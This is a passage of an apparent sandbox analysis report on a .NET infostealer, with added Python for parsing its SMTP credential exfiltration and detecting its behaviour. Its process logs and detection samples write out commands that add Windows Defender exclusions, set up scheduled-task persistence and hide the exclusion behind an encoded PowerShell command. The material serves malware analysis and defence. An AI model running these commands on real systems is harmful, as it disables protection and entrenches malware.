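            if len(parts) == 3:              # initial-response form: username inline
                sess.username, auth_step = _b64(parts[2]), 2
            else:
                auth_step = 1
        elif verb.startswith("AUTH PLAIN") and len(line.split()) == 3:
            fields = _b64(line.split()[2]).split("\0")   # [authzid] \0 user \0 password
            if len(fields) >= 3:
                sess.username, sess.password = fields[-2], fields[-1]
        elif verb.startswith("MAIL FROM:"):
            sess.mail_from = line.split(":", 1)[1].strip().strip("<>")
        elif verb.startswith("RCPT TO:"):
            sess.rcpt_to.append(line.split(":", 1)[1].strip().strip("<>"))
    return sess


def correlate(sess: SmtpSession, config: dict[str, str], dst_port: int) -> dict[str, bool]:
    """Findings that tie a captured session back to the extracted configuration."""
    return {
        "username_matches_config": sess.username == config["Username"],
        "port_matches_config": str(dst_port) == config["Port"],
        "credentials_in_cleartext": sess.username is not None and not sess.starttls,
        "self_addressed": sess.mail_from is not None and sess.mail_from in sess.rcpt_to,
    }


def build_transcript() -> list[tuple[str, str]]:
    """Constructed session; the base64 is computed here so the sample stays consistent."""
    def b(s: str) -> str:
        return base64.b64encode(s.encode()).decode()
    user, pw = EXTRACTED_CONFIG["Username"], "example-password"   # password is a placeholder
    return [
        ("S", "220 us2.smtp.mailhostbox.com ESMTP"), ("C", "EHLO DESKTOP-EXAMPLE"),
        ("S", "250-us2.smtp.mailhostbox.com"), ("S", "250 AUTH LOGIN PLAIN"),
        ("C", "AUTH LOGIN"), ("S", "334 VXNlcm5hbWU6"), ("C", b(user)),
        ("S", "334 UGFzc3dvcmQ6"), ("C", b(pw)), ("S", "235 2.7.0 Authentication successful"),
        ("C", f"MAIL FROM:<{user}>"), ("S", "250 2.1.0 Ok"),
        ("C", f"RCPT TO:<{user}>"), ("S", "250 2.1.5 Ok"),
        ("C", "DATA"), ("S", "354 End data with <CR><LF>.<CR><LF>"),
        ("C", f"From: {user}"), ("C", f"To: {user}"), ("C", "Subject: PW_user/DESKTOP-EXAMPLE"),
        ("C", ""), ("C", "Time: 05/27/2024 12:30:51"), ("C", "User Name: user"), ("C", "."),
        ("S", "250 2.0.0 Ok: queued"), ("C", "QUIT"),
    ]


if __name__ == "__main__":
    s = parse_session(build_transcript())
    print(s.banner, s.username, s.headers.get("Subject"), correlate(s, EXTRACTED_CONFIG, 587))
```

Feed the parser with the reassembled client and server lines of the 49705 or 49709 stream from dump.pcap (any stream-following tool that emits direction-tagged lines will do). If the capture shows STARTTLS instead, the parser stops at that point and the credentials are only recoverable from the extracted configuration, not from the wire.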

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: 0.2.GestorRemesasCONFIRMIMING.exe.38fc328.4.raw.unpack, lBLTBzkV.cs | .Net Code: yom
Source: 0.2.GestorRemesasCONFIRMIMING.exe.38c0108.5.raw.unpack, lBLTBzkV.cs | .Net Code: yom

                    System Summary

Source: 14.2.XNYbGrcoFr.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: 0.2.GestorRemesasCONFIRMIMING.exe.38fc328.4.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: 11.2.XNYbGrcoFr.exe.3b11250.3.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: 11.2.XNYbGrcoFr.exe.3b4d470.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: 11.2.XNYbGrcoFr.exe.3b4d470.4.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: 0.2.GestorRemesasCONFIRMIMING.exe.38c0108.5.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: 11.2.XNYbGrcoFr.exe.3b11250.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: 0.2.GestorRemesasCONFIRMIMING.exe.38fc328.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: 0.2.GestorRemesasCONFIRMIMING.exe.38c0108.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Code function: 0_2_00BFDC74
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Code function: 0_2_04B20006
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Code function: 0_2_04B20040
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Code function: 0_2_04B271B0
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Code function: 0_2_06A4C590
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Code function: 0_2_06A46E48
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Code function: 0_2_06A46498
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Code function: 0_2_06A444D0
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Code function: 0_2_06A44D40
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Code function: 0_2_06A448F8
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Code function: 0_2_06A44908
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Code function: 9_2_0294B797
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Code function: 9_2_0294EAB8
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Code function: 9_2_02944AC0
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Code function: 9_2_02943EA8
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Code function: 9_2_029441F0
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Code function: 9_2_068FCA58
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Code function: 9_2_068F9DD0
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Code function: 9_2_0691B438
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Code function: 9_2_06913020
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Code function: 9_2_0691C100
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Code function: 9_2_06915158
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Code function: 9_2_06916170
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Code function: 9_2_069178F0
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Code function: 9_2_06917210
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Code function: 9_2_0691234B
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Code function: 9_2_06910006
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Code function: 9_2_06910040
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Code function: 9_2_0691585F
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Code function: 11_2_0273DC74
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Code function: 11_2_06A1B7B0
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Code function: 11_2_06A16E48
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Code function: 11_2_06A16498
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Code function: 11_2_06A144D0
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Code function: 11_2_06A14D40
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Code function: 11_2_06A148F8
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeCode function: 11_2_06A1490811_2_06A14908
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeCode function: 14_2_0122B7F814_2_0122B7F8
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeCode function: 14_2_0122AB7814_2_0122AB78
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeCode function: 14_2_01224AC014_2_01224AC0
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeCode function: 14_2_01223EA814_2_01223EA8
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeCode function: 14_2_012241F014_2_012241F0
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeCode function: 14_2_06CE235814_2_06CE2358
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeCode function: 14_2_06CE78F014_2_06CE78F0
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeCode function: 14_2_06CEB1A014_2_06CEB1A0
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeCode function: 14_2_06CE515814_2_06CE5158
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeCode function: 14_2_06CE617014_2_06CE6170
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeCode function: 14_2_06CEC10014_2_06CEC100
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeCode function: 14_2_06CE721014_2_06CE7210
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeCode function: 14_2_06CEE31014_2_06CEE310
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeCode function: 14_2_06CE004014_2_06CE0040
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeCode function: 14_2_06CE587014_2_06CE5870
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeCode function: 14_2_06CE001D14_2_06CE001D
                    Source: GestorRemesasCONFIRMIMING.exe, 00000000.00000002.2123183348.0000000002581000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSimpleLogin.dll8 vs GestorRemesasCONFIRMIMING.exe
                    Source: GestorRemesasCONFIRMIMING.exe, 00000000.00000002.2124143987.00000000038C0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamee437cb3d-4ee3-47da-90a1-2184c71e8c7c.exe4 vs GestorRemesasCONFIRMIMING.exe
                    Source: GestorRemesasCONFIRMIMING.exe, 00000000.00000002.2124143987.00000000038C0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs GestorRemesasCONFIRMIMING.exe
                    Source: GestorRemesasCONFIRMIMING.exe, 00000000.00000002.2123183348.000000000260A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamee437cb3d-4ee3-47da-90a1-2184c71e8c7c.exe4 vs GestorRemesasCONFIRMIMING.exe
                    Source: GestorRemesasCONFIRMIMING.exe, 00000000.00000000.2077798168.0000000000290000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameyuZb.exe@ vs GestorRemesasCONFIRMIMING.exe
                    Source: GestorRemesasCONFIRMIMING.exe, 00000000.00000002.2121838053.000000000078E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs GestorRemesasCONFIRMIMING.exe
                    Source: GestorRemesasCONFIRMIMING.exe, 00000000.00000002.2131424313.0000000006D10000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs GestorRemesasCONFIRMIMING.exe
                    Source: GestorRemesasCONFIRMIMING.exe, 00000000.00000002.2131624756.000000000807F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamePowerShell.EXEj% vs GestorRemesasCONFIRMIMING.exe
                    Source: GestorRemesasCONFIRMIMING.exe, 00000000.00000002.2130681757.0000000004EA0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSimpleLogin.dll8 vs GestorRemesasCONFIRMIMING.exe
                    Source: GestorRemesasCONFIRMIMING.exe, 00000009.00000002.4534288426.000000000043E000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamee437cb3d-4ee3-47da-90a1-2184c71e8c7c.exe4 vs GestorRemesasCONFIRMIMING.exe
                    Source: GestorRemesasCONFIRMIMING.exe, 00000009.00000002.4534785774.00000000009B8000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs GestorRemesasCONFIRMIMING.exe
                    Source: GestorRemesasCONFIRMIMING.exe | Binary or memory string: OriginalFilenameyuZb.exe@ vs GestorRemesasCONFIRMIMING.exe
                    Source: GestorRemesasCONFIRMIMING.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 14.2.XNYbGrcoFr.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.GestorRemesasCONFIRMIMING.exe.38fc328.4.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 11.2.XNYbGrcoFr.exe.3b11250.3.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 11.2.XNYbGrcoFr.exe.3b4d470.4.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 11.2.XNYbGrcoFr.exe.3b4d470.4.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.GestorRemesasCONFIRMIMING.exe.38c0108.5.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 11.2.XNYbGrcoFr.exe.3b11250.3.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.GestorRemesasCONFIRMIMING.exe.38fc328.4.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.GestorRemesasCONFIRMIMING.exe.38c0108.5.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: GestorRemesasCONFIRMIMING.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: XNYbGrcoFr.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 0.2.GestorRemesasCONFIRMIMING.exe.38fc328.4.raw.unpack, kGWv.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.GestorRemesasCONFIRMIMING.exe.38fc328.4.raw.unpack, 84Zwl.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.GestorRemesasCONFIRMIMING.exe.38fc328.4.raw.unpack, Z80kh.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.GestorRemesasCONFIRMIMING.exe.38fc328.4.raw.unpack, R7VqEELv.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.GestorRemesasCONFIRMIMING.exe.38fc328.4.raw.unpack, iWM.cs | Cryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.GestorRemesasCONFIRMIMING.exe.38fc328.4.raw.unpack, tHB.cs | Cryptographic APIs: 'CreateDecryptor', 'TransformBlock'
                    Source: 0.2.GestorRemesasCONFIRMIMING.exe.38fc328.4.raw.unpack, YGTyRx.cs | Cryptographic APIs: 'TransformFinalBlock' (4 occurrences)
                    Source: 0.2.GestorRemesasCONFIRMIMING.exe.396afe0.3.raw.unpack, C31OK3DSYLts9Kn2AE.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.GestorRemesasCONFIRMIMING.exe.6d10000.8.raw.unpack, eKV2kFx6gl2oLwtuEY.cs | Security API names: _0020.SetAccessControl
                    Source: 0.2.GestorRemesasCONFIRMIMING.exe.6d10000.8.raw.unpack, eKV2kFx6gl2oLwtuEY.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.GestorRemesasCONFIRMIMING.exe.6d10000.8.raw.unpack, eKV2kFx6gl2oLwtuEY.cs | Security API names: _0020.AddAccessRule
                    Source: 0.2.GestorRemesasCONFIRMIMING.exe.6d10000.8.raw.unpack, C31OK3DSYLts9Kn2AE.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.GestorRemesasCONFIRMIMING.exe.396afe0.3.raw.unpack, eKV2kFx6gl2oLwtuEY.cs | Security API names: _0020.SetAccessControl
                    Source: 0.2.GestorRemesasCONFIRMIMING.exe.396afe0.3.raw.unpack, eKV2kFx6gl2oLwtuEY.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.GestorRemesasCONFIRMIMING.exe.396afe0.3.raw.unpack, eKV2kFx6gl2oLwtuEY.cs | Security API names: _0020.AddAccessRule
                    Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@19/15@3/3
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | File created: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Mutant created: NULL
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:380:120:WilError_03
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:508:120:WilError_03
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Mutant created: \Sessions\1\BaseNamedObjects\knaoSbEVtdAgcuCGDyzxVaRSzY
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5880:120:WilError_03
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4208:120:WilError_03
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | File created: C:\Users\user\AppData\Local\Temp\tmpCF9B.tmp
                    Source: GestorRemesasCONFIRMIMING.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: GestorRemesasCONFIRMIMING.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | File read: C:\Users\user\Desktop\desktop.ini
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: GestorRemesasCONFIRMIMING.exe | ReversingLabs: Detection: 63%
                    Source: GestorRemesasCONFIRMIMING.exe | Virustotal: Detection: 57%
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | File read: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe
                    Source: unknown | Process created: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe "C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe"
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XNYbGrcoFr" /XML "C:\Users\user\AppData\Local\Temp\tmpCF9B.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Process created: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe "C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: unknown | Process created: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XNYbGrcoFr" /XML "C:\Users\user\AppData\Local\Temp\tmpE0F1.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Process created: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe "C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe"
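                    The process-creation entries above record the two host-side behaviours that the Sigma hits in the overview refer to: powershell.exe adding a Windows Defender exclusion with Add-MpPreference, and schtasks.exe registering a task named under Updates\ from an XML file (a .tmp) in the user's Temp directory. The following Python is an added example for this page, not part of the Joe Sandbox report and not code from the sample: detection logic for those two patterns, run over hand-written Sysmon-style process records that mirror the report's command lines. The record layout, the rule names, the helper functions and the constructed -EncodedCommand variant (the base64/UTF-16LE form the "Powershell Base64 Encoded MpPreference Cmdlet" Sigma title describes) are assumptions made for the example, as is the set of abbreviations accepted for -EncodedCommand.

```python
"""Detection logic for two behaviours seen in the report: a Defender exclusion
added via Add-MpPreference and a scheduled task imported from a temp-directory
XML. Runs over constructed process-creation records, not real log data."""
import base64
import binascii
import re

# Constructed Sysmon-style (Event ID 1) records mirroring the report's process
# tree. Hand-written samples for this example; not copied from any log.
SAMPLE_EVENTS = [
    {"pid": 1001,
     "parent": r"C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe",
     "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
                r'Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe"'},
    {"pid": 1002,
     "parent": r"C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe",
     "image": r"C:\Windows\SysWOW64\schtasks.exe",
     "cmdline": r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XNYbGrcoFr" '
                r'/XML "C:\Users\user\AppData\Local\Temp\tmpCF9B.tmp"'},
    # Constructed variant: the same cmdlet hidden behind -EncodedCommand
    # (base64 of UTF-16LE), which a plain substring match on the command line misses.
    {"pid": 1003,
     "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -EncodedCommand " + base64.b64encode(
         'Add-MpPreference -ExclusionPath "C:\\Users\\user\\x.exe"'.encode("utf-16-le")).decode("ascii")},
    # Benign controls: a task imported from a non-temp path, and a read-only cmdlet.
    {"pid": 1004,
     "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks.exe /Create /TN "Backup\Nightly" /XML "C:\ProgramData\Backup\nightly.xml"'},
    {"pid": 1005,
     "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe Get-MpPreference"},
]

# Assumed set of -EncodedCommand spellings; PowerShell accepts unambiguous prefixes.
ENCODED_RE = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
MPPREF_RE = re.compile(r'Add-MpPreference\b.*?-Exclusion(Path|Process|Extension)\s+"?([^"\s]+)"?', re.IGNORECASE)
SCHTASKS_RE = re.compile(r'/Create\b.*?/TN\s+"?([^"\s]+)"?.*?/XML\s+"?([^"\s]+)"?', re.IGNORECASE)
TEMP_DIR_RE = re.compile(r"\\(AppData\\Local\\Temp|Windows\\Temp)\\", re.IGNORECASE)


def effective_cmdline(cmdline):
    """Return the decoded script when PowerShell was given -EncodedCommand, else the line itself."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return cmdline
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le", errors="replace")
    except (binascii.Error, UnicodeDecodeError):
        return cmdline  # not valid base64/UTF-16LE; fall back to the raw line


def detect_defender_exclusion(cmdline):
    """Return the excluded path/process/extension if the line adds a Defender exclusion, else None."""
    m = MPPREF_RE.search(effective_cmdline(cmdline))
    return m.group(2) if m else None


def detect_task_from_temp_xml(cmdline):
    """Return (task name, xml path) when schtasks /Create imports its XML from a temp directory."""
    m = SCHTASKS_RE.search(cmdline)
    if m and TEMP_DIR_RE.search(m.group(2)):
        return m.group(1), m.group(2)
    return None


def analyze(events):
    """Apply both rules to every record; each finding keeps pid, parent image and rule name."""
    findings = []
    for ev in events:
        excl = detect_defender_exclusion(ev["cmdline"])
        if excl:
            findings.append({"pid": ev["pid"], "parent": ev["parent"],
                             "rule": "defender_exclusion_added", "detail": excl})
        task = detect_task_from_temp_xml(ev["cmdline"])
        if task:
            findings.append({"pid": ev["pid"], "parent": ev["parent"],
                             "rule": "scheduled_task_from_temp_xml", "detail": task[1]})
    return findings


def correlate_parents(findings):
    """Parent images that both weakened Defender and set up persistence, as the sample's parent did."""
    rules_by_parent = {}
    for f in findings:
        rules_by_parent.setdefault(f["parent"], set()).add(f["rule"])
    wanted = {"defender_exclusion_added", "scheduled_task_from_temp_xml"}
    return sorted(p for p, rules in rules_by_parent.items() if wanted <= rules)


if __name__ == "__main__":
    found = analyze(SAMPLE_EVENTS)
    for f in found:
        print(f"pid {f['pid']}: {f['rule']} -> {f['detail']}")
    print("parents with both behaviours:", correlate_parents(found))
```

                    The two benign records are there to show the rules' scope: a task imported from C:\ProgramData does not fire, and Get-MpPreference does not fire, while the encoded variant does because the command is decoded before matching. Correlating both rules on one parent image is what separates this sample's pattern from an administrator who adds an exclusion for legitimate reasons.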
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: windows.storage.dllJump to behavior
